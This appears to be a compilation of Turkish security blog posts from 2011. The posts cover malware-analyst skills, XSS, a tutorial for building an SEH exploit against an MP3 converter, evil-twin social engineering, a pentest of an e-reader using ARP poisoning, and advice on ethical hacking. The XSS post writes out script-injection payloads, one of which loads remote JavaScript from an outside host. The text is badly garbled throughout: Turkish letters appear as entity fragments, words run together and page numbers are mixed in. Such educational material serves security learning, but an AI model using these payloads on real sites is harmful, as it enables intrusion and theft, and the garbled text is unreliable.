Uumlnluuml bir banka soyguncusu olan Willie Suttone Neden banka soyuyorsunuz diye bir soru youmlnelten muhabirin aldığı Ccediluumlnkuuml paraorada yanıtını guumlnuumlmuumlze uyarlar ve Neden zararlı yazılım geliştiriyorsunuz diye bir soru soracak olsaydık alacağımız yanıt şuumlphesizCcediluumlnkuuml finansal getirisi ccedilok yuumlksek olurdu ve ilk sorduğumuz sorunun da yanıtını almış olurduk

Oumlyle bir duumlnyada yaşıyoruz ki hiccedil bir zaman kansere aidse ve diğer oumlluumlmcuumll hastalıklara ccedilare bulunmayacağına sadece bu hastalıklarınilerlemesini engelleyen kontrol altında tutan pahalı ilaccedilların piyasada olacağına inanıyorum BilgiBilişim guumlvenliği sektoumlruumlnuuml de aynışekilde duumlşuumlnuumlyorum Hiccedil bir zaman ccedilok guumlvenli bir işletim sistemi tasarlanmayacak veya bir antiviruumls yazılımı tuumlm zararlı yazılımlarıtespit ediyor veya sisteme bulaşmasını engelliyor olmayacak Durum boumlyle olunca da nasıl hastalıkların bulaşmasını engellemek tedavietmekten daha kolay ise aynı şekilde zararlı yazılımların da sistemlere bulaşmasını engellemek sistemlerden kaldırmaktan daha kolayolmaya devam edecek Zararlı yazılımlar ha bulaştı ha bulaşacak derken kurumlar daha fazla zararlı yazılım analistine veya bu beceriyesahip ccedilalışanları istihdam etmeye başlayacak ve bu sayede bu alanda uzmanlaşmak isteyenler bu işten keyif alanlar iccedilin zararlı yazılımanalizi hobi olmaktan ccedilıkarak mesleklerinin bir parccedilası haline doumlnuumlşecektir Oumlzellikle APTlerin dev kurumları hedef aldığı son aylardakendi personeli ile zararlı yazılım analizi yapabilen bir kurum olmanın getirisi (3 partilere guumlven kaygısı kapalı kapılar ardında ccediloumlzuumlmuumlretme ihtiyacı) paha biccedililmez olsa gerek

Peki zararlı yazılım analisti olmak iccedilin ne tuumlr bilgibecerilere sahip olmanız gerekiyor

Programlama becerisi Bilişim guumlvenliği uzmanı olupta programlama dili bilmiyorum demek kulağa ne kadar garip geliyorsa (gelmiyorsada ben ccedilok yadırgıyorum her zaman araccedillar işinizi goumlrmeyebilir) zararlı yazılım analistiyim ancak Assemblyden Javadan CdenCden anlamıyorum demek kulağa bir o kadar garip gelebilir Oumlrneğin Java ile yazılmış bir zararlı yazılımı decompile ettikten sonrakodu analiz etmeniz gerekecek bu durumda ne yapacaksınız Veya zararlı bir yazılımı assembly seviyesinde ccedilalışan bir debugger ile(Ollydbg veya Immnunity Debugger) analiz ediyorsunuz Assembly bilmeden programın akışına nasıl muumldahale edecek veya şifrelemeanahtarlarını nasıl ele geccedilireceksiniz Gereksinimler boumlyle olunca bir zararlı yazılım analistinin C ve Assembly programlama dillerineyabancı olmaması buna ilaveten diğer programlama dilleri ile yazılmış (C++ Java Net) programların kaynak kodlarına az ccedilok goumlzgezdirmiş olması gerekmektedir Bunlara ilaveten Python veya Ruby gibi programlama dillerinden faydalanarak hızlı bir şekilde kendiprogramınızı yazmanız gerekebilir Oumlrneğin hafızadan diske kayıt ettiğiniz (dump) zararlı bir yazılımdan otomatik olarak şifrelemeanahtarlarını toplayan ve şifrelemeyi ccediloumlzen bir program yazmak istiyorsunuz Şayet Python biliyorsanız IDAPython ile ufak betikler(script) yazmanız işinizi oldukccedila hızlandıracaktır Anlayacağınız uumlzere zararlı yazılım analisti olma konusunda ısrarcı iseniz birden fazlaprogramlama dili bilmeniz (uzman seviyesinde olmasa da) şart

Sistem ağ ve uygulama youmlneticisi becerisi En basitinden elinizde analiz etmeniz gereken bir zararlı yazılım var ve bunu kendisisteminizde analiz etmemeniz gerektiğini az ccedilok tahmin edebiliyorsunuzdur Bu durumda yapmanız gereken izole bir ortamda kontrolluumlbir şekilde bu yazılımı ccedilalıştırmaktır Bunun iccedilin sanal ortamlardan (VMWare veya Virtual Box iyi bir seccedilim olacaktır) oluşanzararlı yazılım analiz laboratuvarı kurmanız gerektiği iccedilin işletim sistemi kurulumundan konfiguumlrasyonuna sanal ağ yapılandırmalarıoluşturmaya kadar bir ccedilok konuda bilgi sahibi olmanız gerekmektedir Oumlrneğin Android işletim sistemini hedef alan zararlı bir yazılımıanaliz etmeniz gerekiyor Bu durumda mutlaka Android OS yuumlkluuml bir cihaza mı ihtiyacınız var Tabii ki hayır sanal sistem uumlzerinekuracağınız ve yapılandıracağınız bir emuumllatoumlr işinizi goumlrecektir Veya ağ uumlzerinden yayılmaya ccedilalışan zararlı bir yazılımın oluşturduğutrafiği izlemeniz ve analiz etmeniz gerekecek bu durumda ağ bilgisine ihtiyaccedil duyacaksınız misal hangi port uumlzerinden hangi protokoluumlkullanıyor şifreli mi haberleşiyor Veya analiz ettiğiniz zararlı yazılım internette bulunan bir web sunucusu uumlzerindeki 0 guumln zafiyetiniistismar etmeye ccedilalışıyor ancak analizi tamamlamak iccedilin bunu gerccedilekleştirmesine izin veremezsiniz bu nedenle sanal sisteminizinDNS kayıtlarını aradığı alan adını sanal sisteminize youmlnlendirecek şekilde yapılandırarak ve kuracağınız aynı suumlruumlm web sunucusunayoumlnlendirerek istismar etmesini sağlamanız ve analiz etmeniz gerekecektir Kısacası yeri gelecek sistem ağ ve uygulama youmlneticisininsahip olduğu huumlnerleri sergileyeceğiniz bir ortam oluşturarak zararlı yazılımın başarıyla ccedilalışmasını sağlayacak alt yapıyı oluşturmanızgerekecektir

Her zamanki gibi zararlı yazılım analizi ile ilgili kitaplar okumak (misal Malware Analysts Cookbook ve bu listede yer alan kitaplar)blogları ve haber kaynaklarını takip etmek (misal MNIN Security Blog) eğitimlere katılmak (misal SANSın Reverse-EngineeringMalware Malware Analysis Tools and Techniques eğitimi) ve tabii ki bol bol pratik yapmak (bunun iccedilin uumlzerinde zararlı yazılımtespit edilen sitelerin duyurulduğu twittercomhack4career twitter sayfasına goumlz atmak ve zararlı yazılımları indirerek incelemek iyi birbaşlangıccedil olabilir) zaman iccedilinde sizi başarıya ulaştıracaktır

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

XSS = Basit Bir KutucukSource httpswwwmertsaricacomxss-ve-beefBy MS on August 19th 2011

Bu zamana dek cross-site scripting ile ilgili ccedilok sayıda makale hikaye okumuş olabilirsiniz ancak cross-site scripting zafiyetinin halenweb uygulamalarında en ccedilok rastlanan guumlvenlik zafiyetlerinin başında geliyor olması nedeniyle farkındalığı arttırma adına ben debirşeyler karalamak istedim

Cross-site scripting nam-ı diğer XSS ve Tuumlrkccedile meali ile siteler arası betik ccedilalıştırma zafiyeti ile ilgili son kullanıcı olarak buguumlne dekccedilok fazla haber duydunuz yazılımcı veya youmlnetici olarak ccedilok sayıda XSS yazan bir kutucuk goumlrduumlnuumlz ve bu nedenle XSS zafiyetininuygulama uumlzerinde zararsız kuumlccediluumlk bir kutucuk ccedilıkarmaktan ibaret olduğunu duumlşuumlnebilirsiniz ancak gerccedilekler bir kutucuk ile sınırlı değil

Siteler arası betik ccedilalıştırma zafiyeti (XSS) kabaca bir web uygulamasının girdi olarak kabul ettiği kodu (ccediloğunlukla javascript)filtrelemeden kullanıcıya sunması sonucunda ortaya ccedilıkmaktadır

18

Siteler arası betik ccedilalıştırma zafiyeti uumlccedile ayrılmaktadır

bull Kalıcı (persistentstored) Kullanıcıdan girdi olarak alınan kod (potansiyel zararlı javascript) veritabanına bir defa yazıldıktansonra daha sonra iccedileriğin internet tarayıcısı tarafından her ccedilağrılmasında (oumlrnek olarak foruma yazılmış bir mesajı veya bir haberinaltına yazılan bir yorumu duumlşuumlnuumln) tekrar ve tekrar kullanıcıya sunulur

bull Kalıcı olmayan (non-persistentreflected) Kullanıcıdan girdi olarak alınan kod (potansiyel zararlı javascript) veritabanınayazılmadığı iccedilin sadece bir defa internet tarayıcısı tarafından (E-posta veya sohbet programı uumlzerinden size goumlnderilmiş bir bağlantıadresine (URL) tıkladığınızı duumlşuumlnuumln) ccedilağrılması ile kullanıcıya sunulur

bull DOM tabanlı İstemci tarafında bulunan kodun (javascript) DOMa (Document Object ModelBelge Nesne Yapısıdır) muumldahaleetmesiyle ortaya ccedilıkmaktadır DOM tabanlı XSSin en guumlzel yanı istemci tarafında olduğu iccedilin sunucuya herhangi bir paketgoumlnderilmemektedir bu nedenle sunucu tarafında tespit edilmesi veya engellenmesi muumlmkuumln olmaz

XSS zafiyetinin sadece kutucuk ccedilıkartarak ccedilerez (cookie) ccedilalarak veya olta (phishing) saldırılarında kullanarak istismar edilmeyeceğinedair en guumlzel oumlrneği Apachenin geccedilen sene başına gelenlerden oumlğrenebilirsiniz 2010 yılında art niyetli kişiler tarafından Apachesunucularında bulunan bir web uygulamasında keşfedilen XSS zafiyetinin istismar edilmesi ile başlayan sızma girişimi sunuculardaroot yetkisine sahip olmaları ile son buldu Farkındalığı arttırma adına mutlaka okunması ve okutturulması gereken bu olaya ait detaylıbilgiye buradan ulaşabilirsiniz

XSS zafiyeti ile ilgili bir oumlrnek uumlzerinden geccedilmezsek anlaşılması guumlccedil olacağı iccedilin ufak bir oumlrnek uumlzerinden hızlıca ilerleyelim

Aşağıda yer alan bağlantı adresini ziyaret edecek olursanız karşınıza tfSearch parametresine girdi olarak belirtilen Mert kelimesininaratılması sonucunda sunucu tarafından doumlnen yanıtı goumlreceksiniz Uygulama tarafında tfSearch parametresinde girdi kontroluuml (koumltuumlkarakter filtrelemesi) yapılmadığı iccedilin XSS zafiyetine yol accedilmaktadır

XSS zafiyeti istismar edilmeden kullanım (tfSearch parametresinde XSS zafiteyi bulunmaktadır)

httptestaspvulnwebcomSearchasptfSearch=Mert

XSS zafiyetini istismar ederek kullanım 1 (alarm kutucuğu)

httptestaspvulnwebcomSearchasptfSearch=ltscriptgtalert(XSS)ltscriptgt

XSS zafiyetini istismar ederek kullanım 2 (başka bir siteden zararlı javascript kodu ccedilağırma)

httptestaspvulnwebcomSearchasptfSearch=ltscript SRC=httphackersorgxssjsgtltscriptgt

Unutmayın XSS zafiyetini istismar ederek zararlı bir siteden zararlı javascript kodu ccedilağırmanızı sağlayan art niyetli kişiler internettarayıcınızı uzaktan youmlneterek tuumlm tuş kayıtlarınızı izleyebilir ziyaret ettiğiniz siteleri tespit edebilir Metasploit ile internet tarayıcınızınzafiyetlerini istismar ederek sisteminize sızabilir veya adsl modeminizin youmlnetim sayfasındaki CSRF zafiyetini istismar ederek youmlneticişifrenizi değiştirerek modeminizi kontrol edebilir

Tuş kayıtlarının Beef aracı ile nasıl izlenebildiğini goumlsteren videoyu şiddetle izlemenizi tavsiye ederim

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin beşincisi burada son bulurken herkese guumlvenli guumlnler dilerim

5 Dakikada SEH İstismar Aracı (Exploit) HazırlamaSource httpswwwmertsaricacomtestBy MS on July 19th 2011

Yazılarımı takip edenleriniz daha oumlnce SEH İstismarını konu olan bir yazı yazdığımı hatırlayacaktır Buguumlnkuuml yazımda SEH istismararacının Immunity Debugger uumlzerinde ccedilalışan pvefindaddrpy eklentisi ile nasıl kısa bir suumlre iccedilinde hazırlanabileceğini goumlreceğiz

Immunity Debugger istismar aracı (exploit) hazırlamak zararlı yazılım (malware) analizi ve tersine muumlhendislik yapmak isteyenlericcedilin oldukccedila başarılı bir hata ayıklama (debugger) aracıdır Sade ve anlaşılır arayuumlzuuml komut satırı desteği ve Python ile betik (script)hazırlamaya imkan tanıyan desteği sayesinde masauumlstuumlmuumln vazgeccedililmezleri arasında yer almaktadır

pvefindaddrpy eklentisi Peter Van Eeckhoutte tarafından istismar aracı hazırlamak iccedilin oumlzel olarak tasarlanmış ve iccedilinde paternoluşturmaktan otomatik istismar kodu şablonu oluşturmaya kadar bir ccedilok oumlzelliğe sahiptir Eklentinin kullanımı ile ilgili detaylı bilgiyeburadan ulaşabilirsiniz

Adımlara geccedilmeden oumlnce ilk olarak sisteminizde yuumlkluuml olan Immunity Debugger aracı iccedilin pvefindaddrpy aracını buradan indirerek CProgram FilesImmunity IncImmunity DebuggerPyCommands klasoumlruuml altına kopyalayın

İstismar edilecek araccedil olarak daha oumlnceki yazımda adı geccedilen Free WMA MP3 Converter v11 aracını kullanacağız

Immunity Debugger aracını ccedilalıştırdıktan sonra File -gt Open menuumlsuumlnden CProgram FilesFree WMA MP3 ConverterWmpconexearacını seccedilelim ve Open butonuna basalım F9 tuşuna basarak programı ccedilalıştıralım Komut satırında pvefindaddr pattern_create5000 yazarak 5000 bayt buumlyuumlkluumlğuumlnde bir patern oluşturalım Oluşturulan patern CProgram FilesImmunity IncImmunity Debuggermspatterntxt dosyası olarak kayıt edilmektedir

19

Dosyanın iccedilindeki paterni taslak halde olan istismar aracımıza (exppy) kopyaladıktan sonra ccedilalıştırarak WMA MP3 Converterprogramında yer alan hatayızafiyeti tetikleyecek WAV uzantılı dosyayı (MSwav) oluşturalım

WMA MP3 Converter programında yer alan WAV to MP3 butonuna basarak MSwav dosyasını seccedilelim ve Immunity Debugger aracıuumlzerinde Access Violation hatası ile karşılaştıktan sonra komut satırında pvefindaddr suggest yazarak eklenti tarafından bize oumlnerilenistismar aracı oluşturma şablonunu goumlruumlntuumlleyelim (Oumlnerilen kod Perl diline youmlnelik olduğu iccedilin bu kodu Python koduna ccedilevirmemizgerekecektir)

20

Karşımıza ccedilıkan youmlnergelerde istismar aracının başarıyla ccedilalışabilmesi iccedilin POP POP RET adresine ve kabuk koduna (shellcode)ihtiyacımız olduğu belirtildiği iccedilin komut satırında oumlncelikle pvefindaddr p -n yazarak SAFESEHin devre dışı olduğu bir DLLde yeralan POP POP RET adresi bularak istismar aracımızın iskeletini oluşturmaya devam edelim

21

Son olarak hesap makinasını (calcexe) ccedilalıştıracak kabuk kodunu (shellcode) ister Metasploit ile oluşturarak ister herhangi bir istismararacından kopyalayarak şablonda ilgili yere kopyalayarak iskeleti tamamlayalım ve istismar aracını ccedilalıştırarak zafiyeti istismar edenWAV dosyasını oluşturalım WMA MP3 Converter programını ccedilalıştırdıktan sonra MP3 butonuna basarak istismar aracımız tarafındanoluşturulan yeni MSwav dosyasını seccediltiğimizde hesap makinası karşımıza ccedilıkacak ve mutlu sona ulaştığımızı goumlreceğiz

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin doumlrduumlncuumlsuuml burada son bulurken herkese guumlvenli guumlnler dilerim

Şeytan İkizSource httpswwwmertsaricacomseytan-ikizBy MS on June 19th 2011

Geccediltiğimiz aylarda RSAin sistemlerine sızan kişilerin Securid ile ilgili bilgileri ccedilaldıkları ortaya ccedilıktı RSA tarafından yapılanaccedilıklamada saldırıların başlangıccedil noktasında sosyal muumlhendislik ve olta saldırısı (phishing) olduğu dikkat ccedilekiyordu Olta saldırısınıgerccedilekleştirmek iccedilin sosyal ağlardan faydalanan ahlaksız korsanların RSA ccedilalışanlarına ait bilgileri elde ettikleri tahmin ediliyor

İşin iccedilinde insan faktoumlruuml olduğu suumlrece 100 haneli şifre ile korunan bir sisteme sızmak isteyenler şifreyi kırmak yerine sistemsorumlularını kandırma yolunu tercih ediyorlar ve eninde sonunda başarıya ulaşıyorlar bu nedenle RSAin başına gelenlere ccedilokşaşırmıyorum oumlzellikle sosyal ağlarda firma ccedilalışanları tarafından paylaşılan bilgilerin ilerleyen zamanlarda ccediloğu firmanın başını dahaccedilok ağrıtacağını duumlşuumlnuumlyorum

Art niyetli kişiler sosyal muumlhendislik saldırılarında olta saldırılarından faydalandıkları gibi şeytan ikiz (Tuumlrkccedile mealini kendimuydurdum aslı evil twinkoumltuuml ikiz) youmlnteminden de faydalanabiliyorlar Şeytan ikiz youmlntemi teknolojinin nimetlerinden faydalanarakhedef kurumsistemler hakkında o kurumun bir ccedilalışanını taklit ederek hedef kişikişiler uumlzerinden bilgi toplamak kurum sistemlerinesızmak iccedilin hedef kişikişilerin zararlı bir dosyayı (RAT) ccedilalıştırmaları amacıyla kullanılıyor

Amaccedilları gerccedilek bir kişiyi taklit etmek olduğu iccedilin art niyetli kişiler kurban ile ilgili tuumlm bilgileri Facebook Twitter Linkedin Foursquaregibi sosyal ağlardan toplayarak bir araya getiriler Facebook ve Twitter durum mesajları uumlzerinden bu kişinin neler yaptığını Linkedinuumlzerinden oumlzgeccedilmişini Foursquare uumlzerinden hangi mekanlara sıkccedila uğradığını Google arama motoru uumlzerinden de elde edebildiklerigeri kalan bilgileri elde ederek hedef bir sosyal ağ seccediler (kurum ccedilalışanlarına ulaşması kolay olduğu iccedilin ccediloğunlukla Linkedini tercihederler) ve daha sonra burada bu kişi adına sahte bir profil oluşturarak bu kişinin bağlantıları ile iletişime geccedilerek bu kişiyi taklit ederekbağlantı kurdukları kişileri kandırarak hassas bilgilere erişmeye ve oradan sistemlere sızmaya ccedilalışırlar Bu saldırıların oumlnuumlne geccedilmekisteyen kurumsal firmalar ccedilalışanlarının iş ile ilgili sosyal ağlarda (Linkedin) profillerini genele accedilmamaları ve kurumal e-posta adresleriile bu tuumlr sitelere uumlye olmamaları konularında uyarırlar

Genele accedilık Twitter hesabım olduğu iccedilin birguumln Twitter uumlzerinden kendimle ilgili ne tuumlr bilgiler elde edebileceğini merak ettim ve buzamana dek goumlndermiş olduğum mesajları arşivleyen bir site aradım ancak bulamadım Kafaya koyan biri buguumlne kadar goumlndermişolduğum tuumlm mesajları elde edebilir mi diye kafa patlatmaya başladım ve ufak bir program hazırlamaya başladım ve sonunda ortayahedef twitter hesabından buguumlne kadar goumlnderilen tuumlm mesajları toplayan ve kayıt eden twitter_crawlerpy adında bir program ortayaccedilıkıverdi

Programa buradan ulaşabilirsiniz

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin uumlccediluumlncuumlsuuml burada son bulurken herkese guumlvenli guumlnler dilerim

Ekran goumlruumlntuumlsuuml

22

Cybook Orizon Mini PentestSource httpswwwmertsaricacomcybook-orizon-mini-pentestBy MS on April 19th 2011

Bilişim guumlvenliği ile ilgili teknik kitaplar okumaya bayılıyorum oumlzellikle beni zorlayan ccedilıta yuumlkselten kitaplar oldu mu tadındanyenmiyor Kitap okumadığım zaman geri kaldığımı duumlşuumlnerek kendimi koumltuuml hissediyorum bu nedenle kitap okuma konusunda ilginccedilbir motivasyona (takıntı da denebilir )) sahibim Uumlniversite zamanında hayatımın buumlyuumlk bir boumlluumlmuuml bilgisayar başında e-book okumakile geccedilerken iş hayatına geccediliş sonrasında e-book ccedilıktıları ile gezer durur oldum Oumlzellikle işe giderken ve işten gelirken serviste kitapokumak benim iccedilin buumlyuumlk bir keyif ancak her guumln 10-20 sayfalık ccedilıktı almak A4e bassan kocaman kitapccedilık yapsan kuumlccediluumlcuumlk kağıtisrafı goumlz yorgunluğuydu derken okuma aşkı beraberinde bir ccedilok sorunu da getiriyor

Neyse ki nişanlım duruma muumldahale ederek geccediltiğimiz aylarda bana bir e-book okuma cihazı hediye etti Cybook Orizon Duumlnyanın enince e-book okuma cihazı olmasının yanısıra hafif olması (250 gr) dokunmatik ekrana sahip olması micro-usb girişinin olması 2 GBdahili belleğe WIFI bluetooth ve akselerometreye (accelerometer) sahip olması beni memnun eden oumlzelliklerinin başında geliyor

Ahlaklı korsana hediye edilen elektronik cihazın ufak ccedilaplı penetrasyon testinden geccedilirilmemesi gibi bir durum soumlz konusu olamazdıolmadı da )

Teste ilk olarak port taraması ile başladım ve hiccedil accedilık port bulamadım

Daha sonra ARP zehirleme ile MITM (ortadaki adam) saldırısı gerccedilekleştirerek tuumlm trafiği izlemeye başladım Web trafiğindenelde ettiğim bilgiler sayesinde cihaz uumlzerinde ARM Linux kullanıldığını 2621 kernel suumlruumlmuumlne sahip olduğunu ve Mozilla tabanlıoumlzelleştirilmiş bir internet tarayıcısı kullanıldığını oumlğrendim

23

Internet tarayıcısında denediğim aboutconfig ve benzer youmlntemlerin hiccedilbiri işe yaramadı Bunun uumlzerine IKAT (Interactive Kiosk AttackTool)in sitesine bağlanarak internet tarayıcısı uumlzerinden işletim sistemine erişecek youmlntemleri de teker teker denedim ancak yine başarılıolamadım

Cihaz uumlzerinde bluetooth desteği olduğunu soumlylense de henuumlz aktifleştirilmemiş ve yerleşik yazılım (firmware) guumlncellemesi ileaktifleştirileceği belirtiliyor Bu durum aslında yerleşik yazılım uumlzerinde bir ccedilok opsiyonun gizlendiğine işaret ediyor Cybookunsitesinden indirmiş olduğum yerleşik yazılımı incelediğimde normal olarak anlamlı hiccedilbir karakter dizisi ile karşılaşmadım Karakterdağılımına baktığımda ise neden karşılaşmadığım ortadaydı Yerleşik yazılım uumlzerinde yer alan ilk 5 bayt (Boo16) dikkatimi ccedilekti ancakarama motorları uumlzerinde yaptığım araştırmalar sonuccedilsuz kaldı Yerleşik yazılım uumlzerinde manipuumllasyonlar gerccedilekleştirerek ipuccedilları eldeetme yolunu tercih etmek isterdim ancak yazılımın bozulması durumunda bana yol koumlpruuml baraj olarak geri doumlneceği iccedilin daha ilerigitmedim )

Cihaz uumlzerinde yer alan menuumllerde gezinirken Ebook Store menuumlsuumlnuumln ilginccedil işlevi dikkatimi ccedilekti Bu menuumlye girince internet tarayıcısıotomatik olarak sizi Cybookun bir alt sitesine youmlnlendiriyor ve cihazı ADOBE ID ile aktifleştirmenizi sağlıyor Buraya kadar herşeynormal ancak aktifleştirme kısmında javascript ile cihaza goumlnderilen komutlar dikkatimi ccedilekti BOO_CMD ile goumlnderilen her komutunbir işlevi bulunuyor ve site bağımsız olarak bu komutları nerede goumlruumlrse goumlrsuumln aynı işlevi yerine getiriyor Komutları ortaya ccedilıkartmak(enumerate) iccedilin ufak bir betik (script) hazırlayarak karakterinden sonra gelebilecek en fazla 4 karakterden oluşan komutları (dahafazlası web sayfasının boyutunu buumlyuumltuumlyordu) oluşturdum ve daha sonra cihazın oluşturduğu trafiği izlemeye başladım ancak Syncdışında trafik oluşturan herhangi bir komut karşılaşmadım

Son olarak cihazın guumlvenli bir siteye (SSL) bağlanma esnasında sahte sertifika ile karşılaşması durumunda nasıl bir aksiyon aldığınıgoumlrmek iccedilin ufak bir test gerccedilekleştirdiğimde beni uumlzen bir durum ile karşılaştım Cihaz guumlvenli bağlantının kurulması esnasındaMITM saldırısı gerccedilekleştirilmesi durumunda herhangi bir uyarı vermeden iletişim kurmaya devam ediyor yani Starbucksta kahveniziyudumlarken bir yandan e-postalarımı guumlvenli bir şekilde kontrol edeyim deme gibi bir şansınız ne yazıkki bulunmuyor

24

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin birincisi burada son bulurken herkese guumlvenli guumlnler dilerim

Nasıl Ahlaklı Korsan Olunur Source httpswwwmertsaricacomnasil-ahlakli-korsan-olunurBy MS on May 19th 2011

Bu soruyu kendime ilk sorduğumda 15-16 yaşlarındaydım Google arama motorunun var olduğu ama bilinmediği o yıllarda Altavistaarama motoru ile bu soruya yanıt aramak ve cevabını iccedileren sayısız kaynağa ulaşmak pek muumlmkuumln olmuyordu bu nedenle benim deyolum o zamanlar kullanımı oldukccedila popuumller olan IRC sunucularından geccedilti EFnet IRC Ağında yer alan Hackers kanalında sabahakşam konuşmaları takip ederek az da olsa birşeyler oumlğrenmeye ccedilalışıyordum Guumlnuumln birinde sohbet ettiğim bir kişi (keşke rumuzunuhatırlayıp teşekkuumlr edebilsem) samimi bir şekilde programlama konusunda bilgi sahibi olmam gerektiğini ve işletim sistemi olaraksadece Windows ile yetinmeyerek Linux işletim sistemi de kullanmam gerektiğini soumlylemişti Programlama kısmını anlıyordum ancakkara kuru bir ekranda ccedilalışmanın bana ne gibi bir getirisi olacağı konusunda şuumlphelerim vardı Aradan 15 sene geccediltikten ve ahlaklı korsan(ethical hacker penetration tester) olduktan sonra ne zaman program yazsam kendi kendime adam haklıymış der ne zaman Backtrackile ccedilalışmam gerekse al sana kara kuru ekran der dururum )

Ne mutlu bana ki duumlnyanın 4 bir yanından oumlzellikle genccedil arkadaşlardan ccedilok sayıda e-postalar alıyor ve her birini oumlzenle yanıtlıyorumCcediloğunun yanıtını aradığı tek bir soru var nasıl ahlaklı korsan olurum nereden ve nasıl başlamalıyım

Oumlncelikle yazımı ahlaksız korsanların okuması ihtimaline karşı neden ahlaklı olunması gerektiği konusunu kısaca bir kaccedil madde ileaccedilıklayayım

bull Yasalar ile başınız derde girmez

bull Bu işi kariyere doumlnuumlştuumlrerek uzun vadede para kazanabilirsiniz

bull İnsanların guumlvenini sevgisini ve saygısını kazanabilirsiniz

bull İşvereninizin desteğini arkanıza alarak pahalı eğitimlere konferanslara bedava katılma şansı yakalayabilirsiniz )

Gelelim ahlaklı korsan olmak iccedilin yapmanız gerekenlere

bull İngilizce oumlğrenin Herşeyden oumlnce İngilizce bilmeniz gerekir en azından okuduğunuzu anlayacak kadar diyelim Nedeni basitguumlvenlik sektoumlruumlnde gerccedilekleştirilen ccedilalışmalardan kaynaklara kadar ccediloğu materyalin dili İngilizce bu nedenle guumlndemigelişmeleri yakından takip edebilmek iccedilin ne yapın ne edin oumlncelikle İngilizce oumlğrenmeye bakın olmazsa olmaz

bull Programlama dili oumlğrenin Hackerın İngilizce soumlzluumlk anlamına bakacak olursanız programcı kelimesinin geccediltiğini goumlrebilirsinizKorsan olupta programlama bilmemek gibi bir şansınız yok yok diyenlerede itibar etmeyin İstismar aracı hazırlamayı bir kenarakoydum en azından kısa zamanda ccedilok iş başarabilmek ve bunu otomatiğe bağlayabilmek iccedilin kendi programınızı yazmanız gerekenzamanlar mutlaka olacaktır Teknik olarak ileri seviyeye ilerledikccedile (misal tersine muumlhendislik yaparken) programlamanın şartolduğunu goumlrebilirsiniz Guumlvenlik zafiyeti keşfedebilmek iccedilin C programlama dilini oumlğrenmeniz gerekecektir Bu dil sayesindediğer programlama dillerini okuduğunuzda rahatlıkla anlayabildiğinizi goumlreceksiniz bu sayede kaynak kodu analizi sizin iccedilin dahakolay olacaktır Testler esnasında işinizi kolaylaştıracak dillerden bir tanesini muhakkak oumlğrenmelisiniz Bunun iccedilin Pythonutercih ettim mutluyum huzurluyum Kapalı kaynak kodlu yazılımlarda guumlvenlik zafiyeti keşfetmekten istismar kodu kabuk koduoluşturmaya kadar bir ccedilok aşamada Assembly programlama dilini biliyor olmanız yararınıza olacaktır Metasploit ve diğer araccedillarile hepsini hallederim demeyin başlangıccedil seviyesinden oumlteye gidemez program bağımlı yaşarsınız

bull Bol bol okuyun ve pratik yapın Ağ sistem veritabanı web uygulaması konularında temel kitaplar okuyun ve bilgi seviyeniziarttırın Temel seviyede bilgi sahibi olduktan sonra tuumlm bu alanlar ve daha fazlası ile ilgili hacking kitapları okumaya başlayınBunun iccedilin Amazoncom sitesine giderek hacking anahtar kelimesi ile sorgular yapın ve en ccedilok okunan beğenilen kitapları sıraylaokumaya başlayın Başlangıccedil seviyesi iccedilin Hacking Exposed serilerini oumlnerebilirim Okuduğunuzu pratik etmezseniz unutmanızve ihtiyaccedil duymanız durumunda tekrar okumanız gerekebileceği iccedilin kendinize windows ve linux işletim sistemleri kurulu ikisanal makina oluşturun ve tuumlm denemelerinizi oumlğrendiklerinizi bu sistemler uumlzerinde gerccedilekleştirerek pratiğe doumlkuumln

bull Sertifika alın ve eğitimlere gidin Kim ne derse desin sertifikalar işe girmenizi kolaylaştırmaktadır Sertifikayı kartvizit olarakduumlşuumlnebilirsiniz Karşı tarafın (işveren iletişim kurduğunuz kişiler vs) spesifik olarak belli bir alanda sertifikalandırabilecekduumlzeyde temel bilgi seviyesine sahip olduğunuzu anlamasına yardımcı olacaktır Tehditler riskler ve suumlrekli değişen saldırıyoumlntemlerini goumlz oumlnuumlnde bulundurduğunuzda kendinizi suumlrekli guumlncel tutmanız gerekiyor ve katılacağınız eğitimler kitaplarakıyasla kısa zamanda bu bilgiyi almanızı sağlamaktadırlar (Maddi olanakları ccedilok fazla dert etmeyin ccediluumlnkuuml kurumsal bir firmadaccedilalışıyorsanız eğitime bedava gidebileceksiniz)

bull Sabırlı ve duyarlı olun Bir guumlvenlik zafiyeti keşfettiğiniz zaman (karşı sisteme saldırarak değil) oumlrnek olarak kullandığınız birhizmet tasarımsal olarak guumlvenli değil veya kullandığınız programda guumlvenlik zafiyeti keşfettiniz yapacağınız ilk iş zafiyetin doğrugeccedilerli olduğunu teyit etmek olmalıdır Emin olduktan sonra responsible disclosure modelini izleyerek sistemin yetkilisi veyaprogramın dağıtıcısı ile goumlruumlşerek durumu izah etmeye ccedilalışın Empati yaparak kendinizi karşı tarafın yerine koyun ve amacınızınguumlvenlik zafiyetini ortadan kaldırmak olduğunu ve bu hizmeti veya programı kullanan kişilerin art niyetli kişiler tarafından istismaredilmesini engellemek olduğunu ve bu nedenle karşı taraf ile iletişime geccediltiğinizi aklınızdan ccedilıkartmayarak karşı taraf ile şartlarne olursa olsun işbirliği yapmaya ccedilalışın Responsible disclosure modelinde zafiyet ortadan kalktıktan sonra zafiyet ile ilgili

25

detaylı bilgiye ilgili platformlarda yer verebilirsiniz eğer firma guumlvenlik buumllteninde adının geccedilmesini istemiyorsa saygı duyun vesansuumlrleyerek yayınlayın ccediluumlnkuuml amacımız firmayı ve hizmetlerini koumltuumllemek değil insanların guumlvenliğini sağlamak

